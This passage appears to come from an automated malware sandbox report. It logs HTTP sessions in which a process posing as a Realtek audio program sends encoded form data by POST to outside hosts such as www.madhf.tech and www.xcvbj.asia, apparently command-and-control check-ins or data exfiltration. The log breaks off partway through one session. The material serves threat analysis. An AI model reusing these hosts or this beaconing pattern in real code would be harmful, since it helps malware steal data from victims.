                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            17192.168.11.2049766103.224.182.242807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:56:07.642168045 CET749OUTPOST /3iym/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.madhf.tech
                                                                            Origin: http://www.madhf.tech
                                                                            Referer: http://www.madhf.tech/3iym/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 73 68 52 49 6d 55 4e 4c 43 44 36 79 6b 6b 48 4a 30 70 72 50 61 4b 7a 76 66 53 66 4e 46 42 50 30 72 4a 66 34 7a 6c 79 58 69 37 6f 77 4d 68 4f 31 6b 38 53 2f 42 49 79 63 6b 68 69 4c 66 31 66 52 34 63 66 36 64 45 68 68 79 71 61 7a 70 39 35 6c 34 69 6d 34 2b 62 33 69 2b 5a 74 6e 47 53 61 66 51 7a 59 6d 67 69 32 61 47 4e 4d 2f 64 4d 35 7a 66 72 4e 62 42 79 75 31 65 6a 6b 69 78 34 69 4b 33 64 52 69 79 48 4e 51 6a 78 2b 51 53 51 68 41 43 74 6d 66 38 6b 47 75 74 54 5a 30 55 70 33 52 73 56 4a 53 30 4e 59 58 62 47 48 63 6f 4d 70 7a 37 37 67 78 75 57 78 38 66 46 53 6d 66 37 78 58 79 67 3d 3d
                                                                            Data Ascii: 2O=shRImUNLCD6ykkHJ0prPaKzvfSfNFBP0rJf4zlyXi7owMhO1k8S/BIyckhiLf1fR4cf6dEhhyqazp95l4im4+b3i+ZtnGSafQzYmgi2aGNM/dM5zfrNbByu1ejkix4iK3dRiyHNQjx+QSQhACtmf8kGutTZ0Up3RsVJS0NYXbGHcoMpz77gxuWx8fFSmf7xXyg==
                                                                            Dec 3, 2024 18:56:07.843976021 CET871INHTTP/1.1 200 OK
                                                                            date: Tue, 03 Dec 2024 17:56:07 GMT
                                                                            server: Apache
                                                                            set-cookie: __tad=1733248567.7025274; expires=Fri, 01-Dec-2034 17:56:07 GMT; Max-Age=315360000
                                                                            vary: Accept-Encoding
                                                                            content-encoding: gzip
                                                                            content-length: 576
                                                                            content-type: text/html; charset=UTF-8
                                                                            connection: close
                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 [TRUNCATED]
                                                                            Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            18192.168.11.2049767103.224.182.242807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:56:10.363874912 CET769OUTPOST /3iym/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.madhf.tech
                                                                            Origin: http://www.madhf.tech
                                                                            Referer: http://www.madhf.tech/3iym/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 73 68 52 49 6d 55 4e 4c 43 44 36 79 6b 45 33 4a 31 4b 7a 50 62 71 7a 73 52 79 66 4e 54 78 50 77 72 4f 58 34 7a 6b 32 48 69 74 77 77 4d 44 57 31 6e 2b 71 2f 55 49 79 63 73 42 6a 44 62 31 65 64 34 63 54 63 64 41 39 68 79 71 2b 7a 70 39 4a 6c 34 31 79 35 6b 72 33 6b 32 35 74 6c 4c 79 61 66 51 7a 59 6d 67 6d 66 53 47 4e 30 2f 63 38 4a 7a 65 4b 4e 59 4a 53 75 32 64 6a 6b 69 6e 34 6a 42 33 64 52 63 79 46 70 36 6a 7a 32 51 53 53 70 41 43 2f 4f 59 32 6b 47 6f 77 44 59 4c 51 34 65 4e 68 48 77 6b 38 74 77 51 56 56 36 6e 67 36 6b 70 6d 4a 55 56 74 46 74 4f 62 31 72 4f 64 35 77 4d 76 68 6d 61 2f 34 4d 4b 76 45 37 4f 39 30 36 42 74 71 55 31 49 2f 67 3d
                                                                            Data Ascii: 2O=shRImUNLCD6ykE3J1KzPbqzsRyfNTxPwrOX4zk2HitwwMDW1n+q/UIycsBjDb1ed4cTcdA9hyq+zp9Jl41y5kr3k25tlLyafQzYmgmfSGN0/c8JzeKNYJSu2djkin4jB3dRcyFp6jz2QSSpAC/OY2kGowDYLQ4eNhHwk8twQVV6ng6kpmJUVtFtOb1rOd5wMvhma/4MKvE7O906BtqU1I/g=
                                                                            Dec 3, 2024 18:56:10.568619013 CET871INHTTP/1.1 200 OK
                                                                            date: Tue, 03 Dec 2024 17:56:10 GMT
                                                                            server: Apache
                                                                            set-cookie: __tad=1733248570.8813292; expires=Fri, 01-Dec-2034 17:56:10 GMT; Max-Age=315360000
                                                                            vary: Accept-Encoding
                                                                            content-encoding: gzip
                                                                            content-length: 576
                                                                            content-type: text/html; charset=UTF-8
                                                                            connection: close
                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 [TRUNCATED]
                                                                            Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            19192.168.11.2049768103.224.182.242807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:56:13.082297087 CET2578OUTPOST /3iym/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.madhf.tech
                                                                            Origin: http://www.madhf.tech
                                                                            Referer: http://www.madhf.tech/3iym/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 73 68 52 49 6d 55 4e 4c 43 44 36 79 6b 45 33 4a 31 4b 7a 50 62 71 7a 73 52 79 66 4e 54 78 50 77 72 4f 58 34 7a 6b 32 48 69 74 34 77 50 77 65 31 6e 5a 47 2f 53 34 79 63 76 42 6a 41 62 31 66 48 34 63 37 59 64 48 31 78 79 6f 32 7a 6d 2b 78 6c 70 30 79 35 71 62 33 6b 30 35 74 6d 47 53 61 77 51 7a 4a 68 67 69 7a 53 47 4e 30 2f 63 2b 42 7a 4f 72 4e 59 45 79 75 31 65 6a 6b 6d 78 34 6a 70 33 64 59 6e 79 46 73 50 6a 41 4f 51 52 79 5a 41 42 4c 75 59 30 45 47 71 78 44 59 54 51 34 43 6b 68 48 39 62 38 74 55 36 56 58 61 6e 6c 37 45 7a 31 4b 78 4c 34 44 56 33 62 78 53 74 57 70 59 50 76 68 76 6a 37 62 51 49 6c 43 72 62 2b 30 43 57 36 4a 38 4e 64 49 76 2f 65 70 48 5a 5a 41 44 71 46 56 4b 51 49 36 56 36 42 52 67 6e 54 75 39 56 53 51 46 5a 4d 53 67 54 4f 79 46 32 44 4e 67 53 33 50 30 79 4b 68 56 35 42 6e 35 5a 61 49 71 4d 63 33 44 30 30 48 66 32 75 39 76 2b 36 7a 53 67 49 35 2b 71 6d 76 56 44 55 6c 4c 67 58 34 6a 57 4b 62 78 48 44 69 46 73 4d 30 51 77 6e 48 7a 59 62 61 37 58 44 75 78 4f 6a 36 79 72 38 35 34 [TRUNCATED]
                                                                            Data Ascii: 2O=shRImUNLCD6ykE3J1KzPbqzsRyfNTxPwrOX4zk2Hit4wPwe1nZG/S4ycvBjAb1fH4c7YdH1xyo2zm+xlp0y5qb3k05tmGSawQzJhgizSGN0/c+BzOrNYEyu1ejkmx4jp3dYnyFsPjAOQRyZABLuY0EGqxDYTQ4CkhH9b8tU6VXanl7Ez1KxL4DV3bxStWpYPvhvj7bQIlCrb+0CW6J8NdIv/epHZZADqFVKQI6V6BRgnTu9VSQFZMSgTOyF2DNgS3P0yKhV5Bn5ZaIqMc3D00Hf2u9v+6zSgI5+qmvVDUlLgX4jWKbxHDiFsM0QwnHzYba7XDuxOj6yr8547dMbm3Sd7TlcmZhywWzB+PNKHa3bbf8JKCuShGJWHD5gnNRYm9cq8DVM3cDIVTULY/yjaVzfE9AjS8RJx0zzMQry8A127DMgjvBH16yYV4rLK9EI1xHOJDUJ9USpsY4Dc/v6bfi96o2tNX94On+X7q0gDi3suIC7XM4Dj4Urdx3PiVyi1Wl7rqJzlGuEsjocWMfuperkBu0LcD3kJBB7LqZE6nqxaEHqbzVy3Eq7z/YDdF1c0M/sE5LoBfJgV5QSYSuCzFZWcw4PSXIRsMX89trNMlK0y4/GgXl+JHCVtUNq4nSR5azjl6Cwa4i8Ssu7iinPaFaoBbJ2iiRDn53NVNXdL5ZTGNYKlcTdOn5bE0+NRk65qKvXf50dNqgrEnCZ8CCHxJkO9FcVoAIiuWgvxVD08XZPQoMzK0Foe6e4ncSQtejuK6/l6GW6yBj70o4EWl+9da3Pn0Sph+20/nb988lhtilYdvuaXQqQd4QFoQB+iiVVhx/ujNjPtxbftgALAuc888ISkw9RjrbQsGqy7oGNA0KEi90MwmgNxCcyG2yzUS9W/Prd+5OjWN0ZS3QbLugiRpPNyVsRhwPOxFQJVqc70tWWvTZmF+ecOBy0hgOFAQCUzpKg+8Ll2GaOkjLtakVhAqqHFwPEEsu4GkDUvWmOfTTQ4Fhxtl [TRUNCATED]
                                                                            Dec 3, 2024 18:56:13.082361937 CET5340OUTData Raw: 75 74 59 43 69 4c 50 36 7a 72 63 62 53 79 52 31 45 73 4e 73 49 41 6e 45 52 47 41 70 62 70 63 70 30 4e 6d 70 31 55 36 57 32 4a 79 61 42 63 54 64 79 48 56 38 66 73 48 58 31 4c 61 73 42 49 2b 37 30 36 78 49 34 37 64 55 76 37 79 51 6f 34 30 73 69 52
                                                                            Data Ascii: utYCiLP6zrcbSyR1EsNsIAnERGApbpcp0Nmp1U6W2JyaBcTdyHV8fsHX1LasBI+706xI47dUv7yQo40siRgOxhhjDLgD2vwfAYQoE4ETicVsBQrIo5A7+En3hwUxRQK4CQITgWxEIivul6yeLRZXovDfGn+DX+9xuSk0i+1mjXzvl3ejHisLavFndgfN911DLJhZz4e26IIoq3sKLO4qByKn6JXTSZ1Hi1DKrkIZAUIzNVucHXv
                                                                            Dec 3, 2024 18:56:13.278017044 CET871INHTTP/1.1 200 OK
                                                                            date: Tue, 03 Dec 2024 17:56:13 GMT
                                                                            server: Apache
                                                                            set-cookie: __tad=1733248573.2895854; expires=Fri, 01-Dec-2034 17:56:13 GMT; Max-Age=315360000
                                                                            vary: Accept-Encoding
                                                                            content-encoding: gzip
                                                                            content-length: 576
                                                                            content-type: text/html; charset=UTF-8
                                                                            connection: close
                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 [TRUNCATED]
                                                                            Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            20192.168.11.2049769103.224.182.242807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:56:15.799074888 CET484OUTGET /3iym/?2O=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&ChhG6=J-xs HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.madhf.tech
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:56:15.996423960 CET1289INHTTP/1.1 200 OK
                                                                            date: Tue, 03 Dec 2024 17:56:15 GMT
                                                                            server: Apache
                                                                            set-cookie: __tad=1733248575.4712803; expires=Fri, 01-Dec-2034 17:56:15 GMT; Max-Age=315360000
                                                                            vary: Accept-Encoding
                                                                            content-length: 1457
                                                                            content-type: text/html; charset=UTF-8
                                                                            connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6d 61 64 68 66 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 33 69 79 6d 2f 3f 32 4f 3d 68 6a 35 6f 6c 6b 73 63 46 6e 71 53 70 47 61 59 71 66 6a 42 5a 72 61 37 58 79 61 42 4f 53 6d 6e 73 39 2f 6d 33 32 53 7a 36 74 34 46 42 54 47 73 74 74 57 70 56 70 4f 42 71 53 4b 65 54 52 4c 6b 2f 66 61 42 59 55 52 57 38 5a 65 46 74 2f 4a 6e 6e 58 4c 75 67 59 61 2f 38 4c 6f 33 51 69 4f 33 59 53 68 48 70 6d 33 4b 4a 4c 4d 68 57 64 74 69 61 6f 39 66 46 47 67 3d 26 43 68 68 47 36 3d 4a 2d 78 73 26 27 3b 0a 0a 2f 2f 20 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/3iym/?2O=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&ChhG6=J-xs&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff" text="#000000"><div style='display: none;'><a href='http: [TRUNCATED]
                                                                            Dec 3, 2024 18:56:15.996474028 CET440INData Raw: 2e 6d 61 64 68 66 2e 74 65 63 68 2f 33 69 79 6d 2f 3f 32 4f 3d 68 6a 35 6f 6c 6b 73 63 46 6e 71 53 70 47 61 59 71 66 6a 42 5a 72 61 37 58 79 61 42 4f 53 6d 6e 73 39 2f 6d 33 32 53 7a 36 74 34 46 42 54 47 73 74 74 57 70 56 70 4f 42 71 53 4b 65 54
                                                                            Data Ascii: .madhf.tech/3iym/?2O=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&ChhG6=J-xs&fp=-3'>Click here to enter</a></div><noscript><meta http-equiv="refresh" content="0; URL=


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            21192.168.11.2049770149.88.81.190807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:56:22.293411970 CET749OUTPOST /hkgx/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.xcvbj.asia
                                                                            Origin: http://www.xcvbj.asia
                                                                            Referer: http://www.xcvbj.asia/hkgx/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 39 69 39 49 4b 4a 2f 59 69 6e 6b 70 64 63 33 2f 30 72 52 6a 35 44 6c 66 44 55 4f 46 72 6e 4f 6d 4b 4d 61 45 32 38 42 2f 44 6a 43 38 47 72 51 69 57 6c 4a 74 46 70 65 56 69 6b 44 48 53 67 6d 41 6d 63 75 6a 4d 49 67 32 6b 68 4e 45 67 67 59 44 31 6a 56 63 6f 51 38 74 6b 73 37 31 63 74 6c 37 4c 69 46 69 72 44 6a 78 6e 45 39 51 45 4d 53 46 52 46 54 36 59 64 31 64 50 55 73 4d 35 46 55 6d 51 76 68 43 74 47 56 72 4a 5a 72 4e 54 6c 4b 53 6a 46 4a 4b 42 4e 54 46 66 37 39 6e 70 35 4e 6d 2f 2f 44 32 75 79 63 65 46 71 44 69 34 43 31 66 70 69 58 49 49 63 73 33 68 45 44 63 74 78 54 53 6e 51 3d 3d
                                                                            Data Ascii: 2O=9i9IKJ/Yinkpdc3/0rRj5DlfDUOFrnOmKMaE28B/DjC8GrQiWlJtFpeVikDHSgmAmcujMIg2khNEggYD1jVcoQ8tks71ctl7LiFirDjxnE9QEMSFRFT6Yd1dPUsM5FUmQvhCtGVrJZrNTlKSjFJKBNTFf79np5Nm//D2uyceFqDi4C1fpiXIIcs3hEDctxTSnQ==
                                                                            Dec 3, 2024 18:56:22.625554085 CET691INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 17:56:22 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 548
                                                                            Connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            22192.168.11.2049771149.88.81.190807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:56:25.169666052 CET769OUTPOST /hkgx/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
